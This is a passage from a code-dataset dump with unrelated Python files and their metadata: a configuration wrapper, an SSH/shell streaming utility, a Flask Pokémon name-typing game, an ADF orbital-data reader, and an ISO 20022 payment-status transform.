self._flags = flags\n super().__init__(handle)\n\n @property\n def flags(self) -> ConfigurationFlags:\n \"\"\"Configuration flags.\"\"\"\n return self._flags\n\n def update_from_command_line(self, argv: List[str], options: CommandLineOptions = ConfigurationFlags.NONE) -> None:\n \"\"\"Updates the configuration from command line options.\n\n If parsing the command line, files or any given JSON string fails, or\n if help is requested (e.g. by using the --help switch) then a\n DetailedFailureException will be raised containing detailed\n information about the error or the help text.\n\n Args:\n argv: List of command line arguments including the script name.\n options: Options to provide on the command line.\n \"\"\"\n args = (POINTER(c_char) * (len(argv)))()\n for i, arg in enumerate(argv):\n args[i] = create_string_buffer(arg.encode())\n\n yogi_core.YOGI_ConfigurationUpdateFromCommandLine(self._handle, len(args), args, options)\n\n def update_from_json(self, json: Union[JsonView, str, object]) -> None:\n \"\"\"Updates the configuration from a JSON object or a JSON object\n serialized to a string.\n\n If parsing fails then a DetailedFailureException will be raised\n containing detailed information about the error.\n\n Args:\n json: JsonView, serializable object or already serialized object.\n \"\"\"\n if not isinstance(json, JsonView):\n json = JsonView(json)\n\n yogi_core.YOGI_ConfigurationUpdateFromJson(self._handle, json.data.obj)\n\n def update_from_file(self, filename: str) -> None:\n \"\"\"Updates the configuration from a JSON file.\n\n If parsing the file fails then a DetailedFailureException will be\n raised containing detailed information about the error.\n\n Args:\n filename: Path to the JSON file.\n \"\"\"\n yogi_core.YOGI_ConfigurationUpdateFromFile(self._handle, filename.encode())\n\n def dump(self, *, resolve_variables: Optional[bool] = None, indentation: Optional[int] = None) -> str:\n \"\"\"Retrieves the configuration as a JSON-formatted string.\n\n Args:\n resolve_variables: Resolve all configuration variables. If this is\n None then variables will be resolved if and\n only if the configuration supports variables.\n indentation: Number of space characters to use for\n indentation. A value of None uses no spaces\n and omits new lines as well.\n\n Returns:\n The configuration as a JSON-formatted string.\n \"\"\"\n if resolve_variables is None:\n resolve_variables = not bool(self._flags & ConfigurationFlags.DISABLE_VARIABLES)\n\n if indentation is None:\n indentation = -1\n\n json = c_char_p()\n yogi_core.YOGI_ConfigurationDump(self._handle, byref(json), None, int(resolve_variables), indentation)\n return json.value.decode()\n\n def to_json(self, *, resolve_variables: Optional[bool] = None) -> Dict[str, object]:\n \"\"\"Retrieves the configuration as a JSON object.\n\n Args:\n resolve_variables: Resolve all configuration variables. If this is\n None then variables will be resolved if and\n only if the configuration supports variables.\n\n Returns:\n Dictionary representing the configuration.\n \"\"\"\n return json_module.loads(self.dump(resolve_variables=resolve_variables))\n\n def write_to_file(self, filename: str, *, resolve_variables: Optional[bool] = None,\n indentation: Optional[int] = None) -> None:\n \"\"\"Writes the configuration to a file in JSON format.\n\n This is useful for debugging purposes.\n\n Args:\n filename: Path to the output file.\n resolve_variables: Resolve all configuration variables. If this is\n None then variables will be resolved if and\n only if the configuration supports variables.\n indentation: Number of space characters to use for\n indentation. A value of None uses no spaces\n and omits new lines as well.\n \"\"\"\n if resolve_variables is None:\n resolve_variables = not bool(self._flags & ConfigurationFlags.DISABLE_VARIABLES)\n\n if indentation is None:\n indentation = -1\n\n yogi_core.YOGI_ConfigurationWriteToFile(self._handle, filename.encode(), int(resolve_variables), indentation)\n\n def validate(self, schema: 'Configuration', *, section: str = None) -> None:\n \"\"\"Validates the configuration against a JSON Schema.\n\n The validation is based on JSON Schema draft-07, see\n http://json-schema.org/. The schema to validate against has to be\n supplied in the schema parameter which needs to be a configuration\n object itself.\n\n If the validation fails, a DetailedFailureException with the\n CONFIGURATION_VALIDATION_FAILED error will be raised, containing a\n human-readable description about the failure.\n\n The section parameter can be used to specify a section of the\n configuration to validate instead of the whole configuration.\n\n Args:\n schema: The schema to use.\n section: Section in the configuration to validate; syntax is\n JSON pointer (RFC 6901).\n \"\"\"\n if section:\n section = section.encode()\n\n yogi_core.YOGI_ConfigurationValidate(self._handle, section, schema._handle)\n","repo_name":"yohummus/yogi-framework","sub_path":"yogi-python/yogi/_configuration.py","file_name":"_configuration.py","file_ext":"py","file_size_in_byte":6882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70884293852","text":"\"\"\"\nStreaming Shell / SSH Commands.\n\nReturn Generator Objects enabling streaming output\n\n\"\"\"\nimport os\nimport subprocess\n\n\nfrom cmd_exception import ReturnCodeError\nimport ssh_conn\n\n\ndef run_cmd(command, work_dir=None):\n \"\"\"\n Run shell command with streaming output.\n\n Input:\n command - string of command to run\n work_dir - working directory\n Returns(per iteration):\n output_str\n Raises:\n CommandException\n ReturnCodeError\n\n \"\"\"\n if work_dir is not None:\n os.chdir(work_dir) # Change to working directory\n\n # Run Command\n ps = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)\n\n # Read + yield stdout until process ends\n while ps.poll() is None:\n line = ps.stdout.readline()\n if line != \"\":\n yield line\n\n return_code = ps.returncode\n # Throw exception if return code is not 0\n if return_code:\n exc = \"\\nCOMMAND:%s\\nRET_CODE:%i\" % (command, return_code)\n raise ReturnCodeError(exc, return_code)\n\n\ndef run_cmd_list(commands, work_dir=None):\n \"\"\"\n Run a list of shell commands with streaming output.\n\n Input:\n commands - list of commands to run\n work_dir - working directory\n Returns (per iteration):\n output_str\n Raises:\n TypeError\n CommandException\n ReturnCodeError\n\n \"\"\"\n if not isinstance(commands, list):\n raise TypeError(\"commands must be a list\")\n for command in commands:\n for line in run_cmd(command, work_dir):\n yield line\n\n\ndef run_ssh_cmd(host, command, work_dir=None, username=None,\n key_filename=None, _connection=None):\n \"\"\"\n Run shell command over ssh with streaming output.\n\n Input:\n host - target machine\n command - string of command to run\n work_dir - working directory\n username - target machine user (if not specified current user)\n key_filename - filepath for private key\n _connection - SSH Connection\n Returns(per iteration):\n output_str\n Raises:\n CommandException\n SSHError\n ReturnCodeError\n\n \"\"\"\n # If no connection passed in create our own\n if _connection is None:\n ssh = ssh_conn.connect(host, username, key_filename)\n else:\n ssh = _connection\n\n # Handle Working Directory\n if work_dir is not None:\n command = \"cd %s && %s\" % (work_dir, command)\n\n # Run Command\n stdin, stdout, stderr = ssh.exec_command(command)\n\n while True:\n out = stdout.readline()\n # Stderr can block waiting so check to see if its ready\n if stderr.channel.recv_stderr_ready():\n out = out + stderr.readline()\n # If\n if out != \"\":\n yield out\n else:\n break\n\n return_code = stdout.channel.recv_exit_status()\n # Throw exception if return code is not 0\n if return_code:\n ssh.close() # Tidy Up\n exc = \"COMMAND:%s\\nRET_CODE:%i\" % (command, return_code)\n raise ReturnCodeError(exc, return_code)\n\n if _connection is None:\n ssh.close()\n\n\ndef run_ssh_cmd_list(host, commands, work_dir=None, username=None,\n key_filename=None):\n \"\"\"\n Run a list of shell commands over ssh with streaming output.\n\n Input:\n host - target machine\n commands - list of commands to run\n work_dir - working directory\n username - target machine user (if not specified current user)\n key_filename - filepath for private key\n Returns (per iteration):\n output_str\n Raises:\n TypeError\n CommandException\n SSHError\n ReturnCodeError\n\n \"\"\"\n if not isinstance(commands, list):\n raise TypeError(\"commands must be a list\")\n\n ssh = ssh_conn.connect(host, username, key_filename)\n\n for command in commands:\n for line in run_ssh_cmd(host, command, work_dir, username,\n key_filename, ssh):\n yield line\n\n ssh.close()\n","repo_name":"graze/pycmd-utils","sub_path":"cmd_utils/streaming.py","file_name":"streaming.py","file_ext":"py","file_size_in_byte":4093,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"2112718705","text":"# -*- coding: utf-8 -*-\nimport os\n\nfrom flask import Flask, render_template, request\nimport urllib3\nfrom bs4 import BeautifulSoup\nimport random\n\napp = Flask(__name__)\n\nMONSTER_NO_MAX=898\nIMG_SOURCE_URL='https://zukan.pokemon.co.jp/detail/'\n\nclass Monster:\n pass\n\n@app.route(\"/\")\n@app.route(\"/\", methods=['GET', 'POST'])\ndef show(id=None, mistake=False):\n if id is None: id = \"{:03d}\".format(random.randint(1, MONSTER_NO_MAX))\n\n print(id)\n url = IMG_SOURCE_URL + str(id)\n\n http = urllib3.PoolManager()\n r = http.request('GET', url)\n\n soup = BeautifulSoup(r.data, 'html.parser')\n meta_tag = soup.find_all('meta', attrs={'property': 'og:image'})\n img_url = meta_tag[0].get('content')\n meta_tag = soup.find_all('meta', attrs={'property': 'og:title'})\n name = meta_tag[0].get('content').split(u'|')[0].split()[0]\n def translate_kana2alphabet(kana):\n map_k2a = {u'ア':'A', u'イ':'I', u'ウ':'U', u'エ':'E', u'オ':'O', u'カ':'KA', u'キ':'KI',u'ク':'KU',u'ケ':'KE',u'コ':'KO',\n u'サ':'SA',u'シ':'SHI',u'ス':'SU',u'セ':'SE',u'ソ':'SO',u'タ':'TA',u'チ':'CHI',u'ツ':'TU',u'テ':'TE',u'ト':'TO',\n u'ナ':'NA',u'ニ':'NI',u'ヌ':'NU',u'ネ':'NE',u'ノ':'NO',u'ハ':'HA',u'ヒ':'HI',u'フ':'FU',u'ヘ':'HE',u'ホ':'HO',\n u'マ':'MA',u'ミ':'MI',u'ム':'MU',u'メ':'ME',u'モ':'MO',u'ヤ':'YA',u'ユ':'YU',u'ヨ':'YO',u'ワ':'WA',u'ヲ':'WO',u'ン':'NN',\n u'ラ':'RA',u'リ':'RI',u'ル':'RU',u'レ':'RE',u'ロ':'RO',\n u'ガ':'GA',u'ギ':'GI',u'グ':'GU',u'ゲ':'GE',u'ゴ':'GO',u'ザ':'ZA',u'ジ':'JI',u'ズ':'ZU',u'ゼ':'ZE',u'ゾ':'ZO',\n u'ダ':'DA',u'ヂ':'DI',u'ヅ':'DU',u'デ':'DE',u'ド':'DO',u'バ':'BA',u'ビ':'BI',u'ブ':'BU',u'ベ':'BE',u'ボ':'BO',\n u'パ':'PA', u'ピ':'PI',u'プ':'PU',u'ペ':'PE',u'ポ':'PO',u'ヴ':'VU',u'ッ':'XTU',u'ャ':'XYA',u'ュ':'XYU',u'ョ':'XYO',\n u'ァ':'XA',u'ィ':'XI',u'ゥ':'XU',u'ェ':'XE',u'ォ':'XO',\n u'ー':'-',u'・':'',u' ':' ',u'♀':'',u'♂':'',u'Z':'Z',u':': ''}\n alphabets = []\n for char in kana:\n alphabets.append(map_k2a[char])\n\n # 「ッ」の処理\n for i, alphabet in enumerate(alphabets):\n if alphabet == 'XTU': alphabets[i+1] = alphabets[i+1][0] + alphabets[i+1][:]\n\n # 「ャ」「ュ」「ョ」の処理\n # ���下、前の子音+母音でいけるもの KI XYA -> KYA\n # 「キャ」「キュ」「キョ」「シャ」「シュ」「ショ」「チャ」「チュ」「チョ」「ニャ」「ニュ」「ニョ」「ヒャ」「ヒュ」「ヒョ」\n # 「ミャ」「ミュ」「ミョ」「リャ」「リュ」「リョ」「ギャ」「ギュ」「ギョ」「ジャ」「ジュ」「ジョ」「ヂャ」「ヂュ」「ヂョ」\n # 「ビャ」「ビュ」「ビョ」「ピャ」「ピュ」「ピョ」\n for i, alphabet in enumerate(alphabets):\n if alphabet in ('XYA', 'XYU', 'XYO'): \n if alphabets[i-1] in ('SHI','CHI','JI'):\n alphabets[i-1] = alphabets[i-1][:-1] + alphabets[i][2]\n else:\n alphabets[i-1] = alphabets[i-1][:-1] + alphabets[i][1:3]\n elif alphabet in ('XE'):\n if alphabets[i-1] in ('SHI','CHI','JI'):\n alphabets[i-1] = alphabets[i-1][:-1] + alphabets[i][1]\n \n alphabets = [alphabet for alphabet in alphabets if alphabet not in ('XYA', 'XYU', 'XYO','XE', 'XTU', '')]\n print(alphabets)\n return ' '.join(alphabets)\n\n alphabets = translate_kana2alphabet(name)\n\n return render_template('index.html', id=id, img_url=img_url, name=name, alphabets=alphabets, mistake=mistake)\n\n@app.route(\"/check\", methods=['POST'])\ndef cehck():\n print(request.form.get('input'))\n input = request.form.get('input').replace(' ', '')\n name = request.form.get('alphabets').replace(' ', '')\n id = request.form.get('id')\n\n if input.lower() == name.lower():\n new_id = \"{:03d}\".format(random.randint(1, MONSTER_NO_MAX))\n return show(new_id)\n else:\n return show(id, mistake=True)\n\n@app.route(\"/search\")\ndef search():\n return render_template('search.html')\n\n@app.route(\"/test\")\ndef test():\n return render_template('test.html')\n\nif __name__ == \"__main__\":\n #app.run(debug=True, host=\"0.0.0.0\", port=int(os.environ.get(\"PORT\", 8080)))\n app.run(debug=True)","repo_name":"shuuuuua/typing_monsters","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4433,"program_lang":"python","lang":"fa","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27600229294","text":"\"\"\"\r\nModule containing functions for extracting SFO data from the rkf files of fragment analysis calculations.\r\nThe following terms can be extracted form the rkf files:\r\n- Overlap (in a.u.)\r\n- Orbital Energy (in eV)\r\n- Occupation (in a.u.)\r\n- Gross Populations (in a.u.)\r\n\r\nBEFORE READING FURTHER: please read the following section about the format of the rkf files:\r\nhttps://www.scm.com/doc/ADF/Appendices/TAPE21.html\r\n\r\nImportant sections together with associated variables are (format: (\"section\", \"variable\")):\r\n- \"Symmetry\", \"ncbs\" = Number of frozen cores per irrep of the complex calculation (could not find a better alternative for Fragment calculations)\r\n- \"SFOs\", \"fragment\" = Fragment index of the ACTIVE* SFOs\r\n- \"SFOs\", \"subspecies\" = Symmetry labels of each ACTIVE SFO (e.g. 1: \"A1\", 2: \"A1\", 3: \"A2\", 4: \"A2\", ...)\r\n- \"SFOs\", \"occupation\" = Occupations of the ACTIVE SFOs\r\n- \"SFOs\", \"escale\" = Orbital energies of ACTIVE SFOs in Ha (relativistic effects are taken into account)\r\n- \"SFOs\", \"energy\" = Orbital energies of ACTIVE SFOs in Ha (relativistic effects are NOT taken into account)\r\n- \"SFO popul\", \"sfo_grosspop\" = Gross populations of the SFOs (FROZEN SFOS INCLUDED!)\r\n\r\nthat can be viewed in the KF Browser of AMS (open a \"adf.rkf\" file and press \"ctrl + E\" on Windows or \"cmd + E\" on Mac).\r\n* Active SFOs are SFOs that are not frozen cores.\r\n\"\"\"\r\nfrom __future__ import annotations\r\n\r\nfrom typing import Callable, Sequence\r\n\r\nimport numpy as np\r\nfrom scm.plams import KFFile\r\n\r\nfrom orb_analysis.custom_types import Array1D, UnrestrictedPropertyDict, SpinTypes\r\n\r\n# --------------------Helper Function(s)-------------------- #\r\n\r\n\r\ndef split_1d_array_into_dict_sorted_by_irreps(data_array: Array1D, irreps: Sequence[str], ) -> dict[str, Array1D]:\r\n \"\"\"\r\n Splits a 1D array into a dictionary of arrays based on the irreps. The irreps are the keys of the dictionary.\r\n data_array and irreps must have the same length.\r\n \"\"\"\r\n n_entries_per_irrep = [irreps.count(irrep) for irrep in set(irreps)]\r\n data_ordered_by_irrep = {irrep: np.zeros(n_entries) for irrep, n_entries in zip(set(irreps), n_entries_per_irrep)}\r\n\r\n # Now we loop over the irreps and add the data to the right array\r\n irrep_counter = {irrep: 0 for irrep in set(irreps)}\r\n for data_entry, irrep in zip(data_array, irreps):\r\n data_ordered_by_irrep[irrep][irrep_counter[irrep]] = data_entry\r\n irrep_counter[irrep] += 1\r\n return data_ordered_by_irrep\r\n\r\n\r\n# -------------------Low-level KF reading -------------------- #\r\n\r\ndef get_frag_name(kf_file: KFFile, frag_index: int) -> str:\r\n \"\"\" Returns the name of the fragment. \"\"\"\r\n frag_name_per_sfo = kf_file.read(\"SFOs\", \"fragtype\").split() # type: ignore\r\n frag_names = list(dict.fromkeys(frag_name_per_sfo))\r\n return frag_names[frag_index - 1]\r\n\r\n\r\ndef uses_symmetry(kf_file: KFFile) -> bool:\r\n \"\"\" Returns True if the complex calculation uses symmetry for its MOs and other parts such as gross populations and overlap. \"\"\"\r\n grouplabel: str = kf_file.read(\"Symmetry\", \"grouplabel\").split()[0] # type: ignore\r\n return grouplabel.lower() != \"nosym\"\r\n\r\n\r\ndef get_total_number_sfos(kf_file: KFFile) -> int:\r\n \"\"\" Returns the total number of *active* SFOs (frozen core SFOs excluded), which is the sum of the SFOs of both fragments. \"\"\"\r\n n_active_sfos = int(kf_file.read(\"SFOs\", \"number\")) # type: ignore\r\n return n_active_sfos\r\n\r\n\r\ndef get_sfo_indices_of_one_frag(kf_file: KFFile, frag_index: int) -> Sequence[int]:\r\n \"\"\" Returns the indices of *active* SFOs belonging to one fragment. \"\"\"\r\n sfo_frag_indices = list(kf_file.read(\"SFOs\", \"fragment\", return_as_list=True)) # type: ignore\r\n sfo_frag_indices = [i for i, sfo_frag_index in enumerate(sfo_frag_indices) if sfo_frag_index == frag_index]\r\n return sfo_frag_indices\r\n\r\n\r\ndef get_irrep_each_sfo_one_frag(kf_file: KFFile, frag_index: int) -> Sequence[str]:\r\n sfo_indices_one_frag = get_sfo_indices_of_one_frag(kf_file, frag_index=frag_index)\r\n frag_symlabels_each_sfo = list(kf_file.read(\"SFOs\", \"subspecies\").split()) # type: ignore\r\n frag_symlabels_each_sfo = [frag_symlabels_each_sfo[i] for i in sfo_indices_one_frag]\r\n return frag_symlabels_each_sfo\r\n\r\n\r\ndef get_ordered_irreps_of_one_frag(kf_file: KFFile, frag_index: int) -> list[str]:\r\n \"\"\" Returns the ordered irreps of *active* SFOs (frozen core SFOs excluded) belonging to one fragment. \"\"\"\r\n sfo_frag_indices = get_sfo_indices_of_one_frag(kf_file, frag_index=frag_index)\r\n all_sfo_irreps: list[str] = kf_file.read(\"SFOs\", \"subspecies\", return_as_list=True).split() # type: ignore\r\n sfo_irreps_of_one_frag = list(dict.fromkeys([all_sfo_irreps[i] for i in sfo_frag_indices]))\r\n return sfo_irreps_of_one_frag\r\n\r\n\r\ndef get_number_sfos_per_irrep_per_frag(kf_file: KFFile, frag_index: int) -> dict[str, int]:\r\n \"\"\" Returns the number of *active* SFOs of each irrep (frozen core SFOs excluded) belonging to one fragment. \"\"\"\r\n sfo_irreps = get_irrep_each_sfo_one_frag(kf_file, frag_index=frag_index)\r\n sfo_irrep_sum = {irrep: sfo_irreps.count(irrep) for irrep in set(sfo_irreps)}\r\n return sfo_irrep_sum\r\n\r\n\r\n# --------------------Frozen Core Handling-------------------- #\r\n\r\ndef get_frozen_cores_per_irrep(kf_file: KFFile, frag_index: int) -> dict[str, int]:\r\n \"\"\"\r\n Reads the number of frozen cores per irrep from the KFFile.\r\n\r\n The number of frozen cores per irrep is important for getting gross populations and overlap analysis.\r\n Basically, the SFO index shown in AMSLevels is different than the index shown in the overlap and population analysis because they can be shifted by frozen cores.\r\n\r\n Moreover, if the complex calculation uses symmetry, but the fragments themselves do not, then the \"A\" irrep is added, being the sum of all frozen cores.\r\n\r\n In case there is no frozen core and no symmetry, but the fragments use symmetry, then the frozen core is 0 for all irreps that are present in the fragments.\r\n \"\"\"\r\n ordered_frag_irreps = get_ordered_irreps_of_one_frag(kf_file, frag_index=frag_index)\r\n n_core_orbs_per_irrep: list[int] = kf_file.read(\"Symmetry\", \"ncbs\", return_as_list=True) # type: ignore since n_core_orbs is a list of ints\r\n\r\n frozen_core_per_irrep = {irrep: n_frozen_cores for irrep, n_frozen_cores in zip(ordered_frag_irreps, n_core_orbs_per_irrep)} # type: ignore\r\n\r\n # Add the \"A\" irrep to the dictionary for the case when symmetry is not used (e.g. NoSym), but the fragments themselves use symmetry.\r\n # This is only used for the overlap analysis.\r\n if not uses_symmetry(kf_file):\r\n frozen_core_per_irrep[\"A\"] = sum(n_core_orbs_per_irrep)\r\n return frozen_core_per_irrep\r\n\r\n\r\n# --------------------Restricted Property Function(s)-------------------- #\r\n\r\ndef get_orbital_energies(kf_file: KFFile, spin: str = SpinTypes.A) -> Array1D[np.float64]:\r\n \"\"\" Reads the orbital energies from the KFFile. \"\"\"\r\n # escale refers energies scaled by relativistic effects (ZORA). If no relativistic effects are present, \"energy\" is the appropriate key.\r\n variable = \"escale\" if (\"SFOs\", \"escale\") in kf_file else \"energy\"\r\n\r\n # It is either \"escale\" or \"escale_B\", apparently there is no \"escale_A\" key (same for \"energy\")\r\n if spin == SpinTypes.B and (\"SFOs\", f\"{variable}_{SpinTypes.B}\") in kf_file:\r\n variable = f\"{variable}_{SpinTypes.B}\"\r\n\r\n # Reads the orbital energies for both fragments and selects the data for the current fragment\r\n orb_energies = np.array(kf_file.read(\"SFOs\", variable)) # type: ignore\r\n\r\n return orb_energies\r\n\r\n\r\ndef get_occupations(kf_file: KFFile, spin: str = SpinTypes.A) -> Array1D[np.float64]:\r\n \"\"\" Reads the occupations from the KFFile. \"\"\"\r\n # It is either \"occupation\" or \"occupation_B\", apparently there is no \"occupation_A\" key\r\n occupation_key = f\"occupation_{SpinTypes.B}\" if spin == SpinTypes.B and (\"SFOs\", f\"occupation_{SpinTypes.B}\") in kf_file else \"occupation\"\r\n occupations = np.array(kf_file.read(\"SFOs\", occupation_key)) # type: ignore\r\n\r\n return occupations\r\n\r\n\r\n# --------------------Unrestricted Property Function(s)-------------------- #\r\n\r\n\r\n# --------------------Property to Function Mapping-------------------- #\r\n\r\n\r\n# Format: {property: (callable function for reading property, section in KFFile, variable in KFFile)}\r\nRESTRICTED_KEY_FUNC_MAPPING: dict[str, Callable] = {\r\n \"orb_energies\": get_orbital_energies,\r\n \"occupations\": get_occupations,\r\n}\r\n\r\n# --------------------Interface Function(s)-------------------- #\r\n\r\n\r\ndef get_fragment_properties(kf_file: KFFile, frag_index: int) -> UnrestrictedPropertyDict:\r\n \"\"\"\r\n Returns a dictionary of dictionaries with the properties of the fragments.\r\n\r\n The properties are:\r\n - Orbital Energies\r\n - Occupations\r\n\r\n Output format:\r\n {\r\n spin (\"A\"/\"B\"): {\r\n property (\"orb_energies\" / occupations): {\r\n irrep (e.g., \"A1\", \"B2\", \"E1:1\"): [data]\r\n }\r\n\r\n Note: this will produce double the amount of data when restricted fragments are used because the spin key is not needed for restricted fragments.\r\n Currently, the \"B\" spin is discarded for restricted calcs in the `create_fragment_data` function.\r\n \"\"\"\r\n sfo_indices_of_one_frag = get_sfo_indices_of_one_frag(kf_file, frag_index)\r\n frag_irreps_each_sfo = get_irrep_each_sfo_one_frag(kf_file, frag_index)\r\n\r\n data_dic_to_be_unpacked = {property: {str(spin): {} for spin in SpinTypes} for property in RESTRICTED_KEY_FUNC_MAPPING}\r\n\r\n for property, func in RESTRICTED_KEY_FUNC_MAPPING.items():\r\n\r\n for spin in SpinTypes:\r\n\r\n data = func(kf_file, spin=spin)\r\n\r\n data = np.array([data[i] for i in sfo_indices_of_one_frag])\r\n\r\n # Now we turn one long array into a dictionary of arrays sorted by irreps (e.g. [.....] -> {\"A1\": [.....], \"A2\": [.....]})\r\n data_dic_to_be_unpacked[property][spin] = split_1d_array_into_dict_sorted_by_irreps(data_array=data, irreps=frag_irreps_each_sfo)\r\n\r\n return data_dic_to_be_unpacked\r\n\r\n\r\ndef get_gross_populations(kf_file: KFFile, frag_index: int = 1) -> dict[str, dict[str, Array1D[np.float64]]]:\r\n \"\"\"\r\n Reads the gross populations from the KFFile by taking into account the frozen cores.\r\n Annoyingly, the \"SFOs\" sections contains the SFOs of both fragments that ALREADY HAVE BEEN FILTERED for the frozen cores.\r\n For example, the SFOs number may be 114, but the gross population array may have 148 entries. This is because the first 34 entries are the frozen cores.\r\n\r\n Structure of the (\"SFOs popul\",\"sfo_grosspop\") section for a restricted calculation with c3v symmetry:\r\n [n Frozen Cores A1, Active SFOs Frag1 A1, Active SFOs Frag2 A1, n Frozen Cores A2, Active SFOs Frag1 A2, Active SFOs Frag2 A2, ...]\r\n\r\n Therefore, the sum of `sfo_indices_of_one_frag` and `n_frozen_cores_per_irrep` is used to get the correct indices for SFOs on both fragments and all irreps.\r\n\r\n Output format:\r\n {\r\n spin (\"A\"/\"B\"): {\r\n irrep (e.g., \"A1\", \"B2\", \"E1:1\"): [data]\r\n }\r\n \"\"\"\r\n symmetry_used = uses_symmetry(kf_file)\r\n frags_sfo_irrep_sums = [get_number_sfos_per_irrep_per_frag(kf_file, frag_index=frag_index) for frag_index in [1, 2]]\r\n\r\n ordered_irreps = get_ordered_irreps_of_one_frag(kf_file, frag_index=frag_index)\r\n frozen_core_per_irrep = get_frozen_cores_per_irrep(kf_file, frag_index=frag_index)\r\n\r\n raw_gross_pop_all_sfos = np.array(kf_file.read(\"SFO popul\", \"sfo_grosspop\"))\r\n\r\n if not symmetry_used:\r\n start_index = sum(frozen_core_per_irrep.values())\r\n total_sfo_sum_frag1 = sum(frags_sfo_irrep_sums[0][irrep] for irrep in frags_sfo_irrep_sums[0])\r\n total_sfo_sum_frag2 = sum(frags_sfo_irrep_sums[1][irrep] for irrep in frags_sfo_irrep_sums[1])\r\n total_sfo_for_one_spin = total_sfo_sum_frag1 + total_sfo_sum_frag2 + start_index\r\n\r\n if frag_index == 1:\r\n return {\r\n SpinTypes.A: {\"A\": raw_gross_pop_all_sfos[start_index: start_index + total_sfo_sum_frag1]},\r\n SpinTypes.B: {\"A\": raw_gross_pop_all_sfos[total_sfo_for_one_spin:total_sfo_for_one_spin + total_sfo_sum_frag1]}\r\n }\r\n\r\n return {\r\n SpinTypes.A: {\"A\": raw_gross_pop_all_sfos[start_index + total_sfo_sum_frag1: start_index + total_sfo_sum_frag1 + total_sfo_sum_frag2]},\r\n SpinTypes.B: {\"A\": raw_gross_pop_all_sfos[total_sfo_for_one_spin + total_sfo_sum_frag1: total_sfo_for_one_spin + total_sfo_sum_frag1 + total_sfo_sum_frag2]}\r\n }\r\n\r\n gross_pop_active_sfos = {str(spin): {irrep: np.zeros_like(frags_sfo_irrep_sums[frag_index-1][irrep], dtype=np.float64) for irrep in frags_sfo_irrep_sums[frag_index - 1]} for spin in SpinTypes}\r\n\r\n # only works if frag1 and frag2 have the same irreps and thus belong to the same point group\r\n for spin in SpinTypes:\r\n raw_gross_pop_index = 0 if spin == SpinTypes.A else get_total_number_sfos(kf_file) + sum(frozen_core_per_irrep.values())\r\n for irrep in ordered_irreps:\r\n n_frozen_cores = frozen_core_per_irrep.get(irrep, 0)\r\n n_sfos_frag1 = frags_sfo_irrep_sums[0][irrep]\r\n n_sfos_frag2 = frags_sfo_irrep_sums[1][irrep]\r\n start_irrep_index = raw_gross_pop_index + n_frozen_cores\r\n\r\n if frag_index == 1:\r\n end_irrep_index = start_irrep_index + n_sfos_frag1\r\n else:\r\n start_irrep_index += n_sfos_frag1\r\n end_irrep_index = start_irrep_index + n_sfos_frag2\r\n\r\n gross_pop_active_sfos[spin][irrep] = raw_gross_pop_all_sfos[start_irrep_index: end_irrep_index]\r\n\r\n raw_gross_pop_index += sum(frags_sfo_irrep_sums[frag_i][irrep] for frag_i in [0, 1]) + n_frozen_cores\r\n\r\n return gross_pop_active_sfos\r\n\r\n\r\n# def main():\r\n# import pathlib as pl\r\n\r\n# current_dir = pl.Path(__file__).parent\r\n# rkf_dir = current_dir.parent.parent.parent / \"test\" / \"fixtures\" / \"rkfs\"\r\n# # rkf_file = 'restricted_largecore_differentfragsym_c4v_full.adf.rkf'\r\n# rkf_file = 'unrestricted_largecore_fragsym_c3v_full.adf.rkf'\r\n# kf_file = KFFile(str(rkf_dir / rkf_file))\r\n\r\n # print(get_orbital_energies(kf_file))\r\n\r\n # print(get_occupations(kf_file))\r\n # print(get_number_sfos_per_irrep_per_frag(kf_file, frag_index=1))\r\n # print(get_frag_name(kf_file, frag_index=2))\r\n # data = get_fragment_properties(kf_file, frag_index=1)\r\n # pprint(data)\r\n # grospop = get_gross_populations(kf_file, frag_index=1)\r\n # print(grospop)\r\n\r\n\r\n# if __name__ == \"__main__\":\r\n# main()\r\n","repo_name":"SiebeLeDe/orbitals","sub_path":"src/orb_analysis/orb_functions/sfo_functions.py","file_name":"sfo_functions.py","file_ext":"py","file_size_in_byte":14669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10096853824","text":"import bots.transform as transform\n\n\ndef main(inn, out):\n\n # Get the original payment id from the original message Id\n original_message_id = inn.get(\n {'BOTSID': 'Document'},\n {'BOTSID': 'CstmrPmtStsRpt'},\n {'BOTSID': 'OrgnlGrpInfAndSts', 'OrgnlMsgId': None})\n\n # transform.persist_add_update('message_lookup', 'MG12', 'USA65')\n # transform.persist_add_update('message_lookup', 'MG13', 'USA92')\n\n original_payment_id = transform.persist_lookup(\n 'message_lookup', original_message_id)\n\n group_status = inn.get({'BOTSID': 'Document'},\n {'BOTSID': 'CstmrPmtStsRpt'},\n {'BOTSID': 'OrgnlGrpInfAndSts', 'GrpSts': None})\n out.data.header = {\n 'payment_identifier': original_payment_id or original_message_id,\n 'transaction_count': inn.get({'BOTSID': 'Document'},\n {'BOTSID': 'CstmrPmtStsRpt'},\n {'BOTSID': 'OrgnlGrpInfAndSts',\n 'OrgnlNbOfTxs': None}),\n\n 'status': transform.ccode('Payment Status', group_status, safe=True)\n }\n\n out.data.lines = []\n for pmt_inf in inn.getloop({'BOTSID': 'Document'},\n {'BOTSID': 'CstmrPmtStsRpt'},\n {'BOTSID': 'OrgnlPmtInfAndSts'}):\n\n for txn_inf in pmt_inf.getloop({'BOTSID': 'OrgnlPmtInfAndSts'},\n {'BOTSID': 'TxInfAndSts'}):\n\n status = txn_inf.get({'BOTSID': 'TxInfAndSts', 'TxSts': None})\n additional_status = txn_inf.get({'BOTSID': 'TxInfAndSts'},\n {'BOTSID': 'StsRsnInf'},\n {'BOTSID': 'Rsn', 'Cd': None})\n out.data.lines.append({\n 'endtoend_identifier': txn_inf.get({'BOTSID': 'TxInfAndSts',\n 'OrgnlEndToEndId': None}),\n 'status_identifier': txn_inf.get({'BOTSID': 'TxInfAndSts',\n 'StsId': None}),\n 'status': transform.ccode('Payment Status', status),\n 'additional_status_code': transform.ccode(\n 'Additional Payment Status', additional_status, safe=True),\n 'additional_status_text': txn_inf.get({'BOTSID': 'TxInfAndSts'},\n {'BOTSID': 'StsRsnInf',\n 'AddtlInf': None})\n 